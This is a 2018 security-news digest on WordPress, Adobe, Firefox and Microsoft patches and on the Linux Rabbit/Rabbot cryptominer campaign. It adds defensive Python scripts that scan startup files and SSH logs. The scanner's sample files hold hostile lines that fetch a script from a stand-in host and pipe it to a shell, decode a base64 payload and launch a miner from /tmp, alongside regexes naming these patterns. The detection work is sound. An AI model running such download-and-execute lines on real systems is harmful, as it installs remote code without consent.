Latest cyber threats, vulnerabilities, data breaches and security updates
Thursday December 13, 2018:
WordPress 5.0.1 Security Update

WordPress released version 5.0.1 that fixes seven vulnerabilities.


"We strongly encourage you to update your sites immediately," WordPress noted in the security release on Thursday morning.

A summary of the bugs discovered by multiple security researchers and addressed in 5.0.1 includes:
  • Authors could alter meta data to delete files that they weren’t authorized to.
  • Authors could create posts of unauthorized post types with specially crafted input.
  • Contributors could craft meta data in a way that resulted in PHP object injection.
  • Contributors could edit new comments from higher-privileged users, potentially leading to a cross-site scripting vulnerability.
  • Specially crafted URL inputs could lead to a cross-site scripting vulnerability in some circumstances. WordPress itself was not affected, but plugins could be in some situations.
  • The user activation screen could be indexed by search engines in some uncommon configurations, leading to exposure of email addresses, and in some rare cases, default generated passwords.
  • Authors on Apache-hosted sites could upload specifically crafted files that bypass MIME verification, leading to a cross-site scripting vulnerability.

Of note, WordPress 5.0.1 adds stricter MIME validation for uploaded files. WordPress 5.0 and earlier are affected by the bugs listed above.

 
Wednesday December 12, 2018:
Adobe fixes vulnerabilities in Acrobat and Reader 

Adobe published security updates to address vulnerabilities in Adobe Acrobat and Reader.

The security update (APSB18-41) addresses 87 vulnerabilities, 38 rated critical. 


Firefox security updates

The Mozilla Foundation issued a security advisory (2018-29) that addresses vulnerabilities in Firefox 64.

Two of the fixes address critical memory safety bugs. Five high-rated and three moderate-rated bugs were also addressed in the update.


 
Tuesday December 11, 2018:
Microsoft December patch updates

Microsoft issued the December 2018 Security Updates that include 39 unique vulnerability fixes, 9 of them rated critical.

The updates address multiple Microsoft products including, but not limited to: Windows, Edge, Office, Office Services and Web Apps, ChakraCore, .NET Framework, Exchange Server, Microsoft Dynamics NAV, Microsoft Visual Studio and Windows Azure Pack (WAP).

According to Microsoft, attackers are exploiting a Windows Kernel Elevation of Privilege Vulnerability (CVE-2018-8611), rated as Important. 

"An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft noted in the advisory. 

Another Windows patch fixes a heap overflow remote code execution (RCE) vulnerability in Windows DNS Server (CVE-2018-8626), which Trend Micro reports is currently under active attack. An attacker could exploit this bug by sending malicious requests to a Windows DNS server.

Also, a number of workstation-related vulnerabilities could be exploited via browsers or by opening malicious files.

See the Security Update Guide and December summary release notes for more details on all patches.


 
Monday December 10, 2018:
Linux Rabbit and Rabbot Malware threats

Security researchers from Anomali Labs have discovered a new malware dubbed "Linux Rabbit" that has targeted Linux servers and Internet-of-Things (IoT) devices in Russia, South Korea, the UK, and the US. 

The cyber campaign was first spotted in August 2018 and continued through October 2018. According to Anomali Labs, the campaign uses two strains of malware that share the same code base, called "Linux Rabbit" and "Rabbot".

The objective of the Linux Rabbit and Rabbot campaign is to install cryptocurrency miners, such as CNRig and CoinHive (both Monero miners), on target devices.

According to the report, Linux Rabbit uses a Tor gateway to establish a connection to its Command and Control (C2) server.

"The malware will randomly select one of the hidden services and then a Tor gateway to follow in order to establish an active C2 URL. The payload for the malware is then sent from the C2 server as an encoded URL parameter," the report noted. 

The malware also establishes persistence on the victim's system via "rc.local" and ".bashrc" files. Once persistence is established, Linux Rabbit attempts to brute force SSH passwords and then installs the cryptocurrency miner on the system.
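The two persistence locations named above are cheap to audit. The following is an added example written for this page, not Anomali's code or a detection from the report: it scans rc.local and .bashrc contents for the traits a download-and-run miner dropper leaves behind. The indicator patterns, the Tor-gateway domains and the sample file contents are all constructed for the example.

```python
"""Added example, not Anomali's code: flag suspicious entries in the startup
files Linux Rabbit abuses for persistence (/etc/rc.local and ~/.bashrc).

The indicator patterns and sample file contents are constructed for this
example; the Tor-gateway domains listed are an assumption, not taken from the
report.
"""
import re

# (regex, label) pairs checked per non-comment line, first match wins.
# Assumed indicator set.
INDICATORS = [
    (r"\.onion\b|onion\.(to|ws|ly|link|cab|sh|pet)\b",
     "Tor hidden service / Tor gateway reference"),
    (r"\b(cnrig|coinhive|xmrig|minerd)\b|stratum\+tcp://",
     "cryptocurrency miner indicator"),
    (r"\b(curl|wget)\b[^|\n]*\|\s*(ba|da)?sh\b",
     "download piped straight to a shell"),
    (r"\bbase64\s+(-d|--decode)\b",
     "base64-decoded payload"),
    (r"(^|[\s;&|(])(/tmp|/dev/shm|/var/tmp)/\S+",
     "executable launched from a world-writable directory"),
    (r"\bnohup\b.*&\s*$",
     "backgrounded, hang-up-immune job"),
]


def scan_startup_file(path, text):
    """Return a list of (path, line_no, label, line) for every flagged line."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for pattern, label in INDICATORS:
            if re.search(pattern, line, re.IGNORECASE):
                findings.append((path, line_no, label, line))
                break  # one finding per line is enough to triage
    return findings


# Constructed sample files: benign lines plus entries in the style of a
# download-and-run miner dropper.  Hostnames use reserved/invalid names.
SAMPLE_RC_LOCAL = """#!/bin/sh -e
# rc.local - executed at the end of multi-user runlevel
/usr/sbin/ntpdate pool.ntp.org
curl -s http://example.invalid/x.sh | sh
/tmp/.x/cnrig -o stratum+tcp://pool.example.invalid:3333 &
exit 0
"""

SAMPLE_BASHRC = """# ~/.bashrc
alias ll='ls -l'
export PATH=$HOME/bin:$PATH
nohup wget -qO- http://abcdefghijklmnop.onion.to/p | base64 -d | bash >/dev/null 2>&1 &
"""


def scan_all():
    """Scan both constructed samples; returns the combined finding list."""
    return (scan_startup_file("/etc/rc.local", SAMPLE_RC_LOCAL)
            + scan_startup_file("/home/user/.bashrc", SAMPLE_BASHRC))


if __name__ == "__main__":
    for path, n, label, line in scan_all():
        print("%s:%d  [%s]  %s" % (path, n, label, line))
```

On a real host, feed `scan_startup_file` the contents of /etc/rc.local and every user's .bashrc (and .profile, which the same technique can abuse); a line that matches is a lead for triage, not proof of compromise, so pair it with the file's modification time and the running process list.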

An excerpt of the SSH brute force attack threat from the Anomali report: 

 
"The SSH brute forcing begins by the malware first generating a random IPv4 string and checking its geolocation to see where it is located. If the IP is located within a country that is 'blacklisted,' it will stop and move on until it finds an IP that is located in an allowed geolocation, which for this malware are Russia, South Korea, the UK, and the US. Once an allowed IP location is discovered, Linux Rabbit will check to see if an SSH server is listening on Port 22. The malware will open a socket to see if it receives a response, and if it does, it will attempt to obtain the machine’s hostname. Interestingly, this malware will also check the Top-Level Domain (TLD) of a host, and will skip any TLD that is blacklisted. Many of the blacklisted TLDs are government-related sites in a variety of countries. If the TLD is not blacklisted, the malware will run through a process of authentication utilizing a list of hard-coded credentials it has. The first two authentication certifications are to ensure that the malware is not in a 'honey pot'. This is likely to avoid static analysis of the malware."
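From the defender's side, the hard-coded credential list described above shows up in sshd's log as a burst of failed logins from one source across several usernames, sometimes followed by a success. The following is an added example written for this page, not code from the Anomali report: it parses standard OpenSSH auth.log lines and flags source addresses that cross a failure threshold within a time window. The log lines are constructed; the thresholds and the assumed log year are parameters of the example.

```python
"""Added example, not from the Anomali report: spot an SSH credential-stuffing
run of the kind Linux Rabbit performs, using sshd's auth.log output.

The log lines are constructed for this example.  The message formats
("Failed password for ...", "invalid user ...", "Accepted password for ...")
are the standard OpenSSH ones; thresholds and the log year are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# OpenSSH auth.log line with a syslog-style timestamp (no year).
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+ ssh2"
)


def parse(line, year=2018):
    """Return (timestamp, result, user, ip) or None for lines we don't handle.
    Syslog omits the year, so the caller supplies it (assumed 2018 here)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("%d %s" % (year, m.group("ts")), "%Y %b %d %H:%M:%S")
    return ts, m.group("result"), m.group("user"), m.group("ip")


def detect(lines, threshold=5, window_s=60):
    """Return {ip: {...}} for every source IP with `threshold` or more failed
    logins inside any `window_s`-second span.  Also records whether a login
    from that IP was accepted after the failures began (likely compromise)
    and which usernames were tried (a wordlist shows as many distinct users)."""
    events = defaultdict(list)
    for line in lines:
        parsed = parse(line)
        if parsed:
            ts, result, user, ip = parsed
            events[ip].append((ts, result, user))

    alerts = {}
    for ip, evs in events.items():
        evs.sort()
        failed = [(ts, u) for ts, r, u in evs if r == "Failed"]
        # sliding window: does any run of `threshold` failures fit in window_s?
        hit = any(
            (failed[i + threshold - 1][0] - failed[i][0]).total_seconds() <= window_s
            for i in range(len(failed) - threshold + 1)
        )
        if not hit:
            continue
        first_fail = failed[0][0]
        accepted = any(r == "Accepted" and ts >= first_fail for ts, r, u in evs)
        alerts[ip] = {
            "failed": len(failed),
            "users": sorted({u for _, u in failed}),
            "accepted_after_failures": accepted,
        }
    return alerts


# Constructed sample: one scanner working a small credential list against
# root and common IoT/default accounts, then succeeding; one legitimate user
# who mistyped a password once.  Addresses are from documentation ranges.
SAMPLE_LOG = """\
Oct 12 03:14:01 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 41022 ssh2
Oct 12 03:14:03 web1 sshd[2201]: Failed password for root from 203.0.113.7 port 41022 ssh2
Oct 12 03:14:06 web1 sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 41030 ssh2
Oct 12 03:14:09 web1 sshd[2205]: Failed password for invalid user pi from 203.0.113.7 port 41038 ssh2
Oct 12 03:14:12 web1 sshd[2207]: Failed password for invalid user ubnt from 203.0.113.7 port 41044 ssh2
Oct 12 03:14:15 web1 sshd[2209]: Failed password for root from 203.0.113.7 port 41050 ssh2
Oct 12 03:14:20 web1 sshd[2211]: Accepted password for root from 203.0.113.7 port 41056 ssh2
Oct 12 03:20:40 web1 sshd[2300]: Failed password for alice from 198.51.100.9 port 50212 ssh2
Oct 12 03:20:55 web1 sshd[2300]: Accepted password for alice from 198.51.100.9 port 50212 ssh2
Oct 12 03:21:00 web1 sshd[2300]: pam_unix(sshd:session): session opened for user alice by (uid=0)
"""


if __name__ == "__main__":
    for ip, info in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, info)
```

The `accepted_after_failures` flag is the one to page on: a threshold hit alone is background noise on any Internet-facing port 22, but a success from the same source right after a wordlist run is the moment the miner gets dropped.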

The report concludes that a follow-on campaign ran from September through October 2018 using a different malware strain to infect systems. The new campaign uses "Rabbot," a self-propagating worm that shares the same code base as Linux Rabbit.

Rabbot can also infect IoT devices, in addition to Linux systems, by exploiting known vulnerabilities. 

Some of the vulnerabilities Rabbot is known to exploit include: CVE-2018-1149, CVE-2018-9866, CVE-2017-6884, CVE-2016-0792 and CVE-2015-2051.